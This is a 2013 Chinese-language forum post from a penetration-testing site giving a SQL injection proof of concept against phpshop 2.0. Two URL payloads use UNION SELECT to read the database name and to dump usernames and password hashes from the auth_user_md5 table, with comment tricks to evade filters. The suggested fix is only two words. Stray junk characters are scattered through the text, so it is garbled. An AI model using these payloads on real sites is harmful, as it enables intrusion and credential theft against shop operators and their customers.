中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability" M) {" l& ]% Y

" I7 }& R/ S% g) d1 A作者 : By onestree
' p6 X. W) i: c& [6 d下载地址 : http://code.google.com/p/phpshop/downloads/list
/ I# o2 n# [% {2 [0 K1 K测试地址: windows 7 / ubuntu1 Q# S: i* F2 v* @5 K
4 ?2 p! }; K' F

& q0 g, a' a, r/ O$ }5 L* }SQLi p0c:: p1 }" _" i. b  H+ H+ e+ O4 t/ z5 S

/ q# @  U& y  g; L  W4 q+ l==================
* y" w( Z. z! N- |  M- H 3 O* j, @4 k1 |3 z% M4 t
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'9 @# Q3 y; T1 t: y1 [0 G& x
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --4 Q1 b6 U6 L+ x
8 Y% @# B. s. M! C$ y1 v4 d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& T6 I+ S' x+ T' H
9 y! Y3 d+ i  Y, q修复:2 \/ X4 R2 n" G6 K, `5 ?- d
加强过滤
- S$ A8 r2 O, e; x/ I& ]5 N" G5 T% V* c5 ^* F* A& i

5 P$ m% q+ ]6 x



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2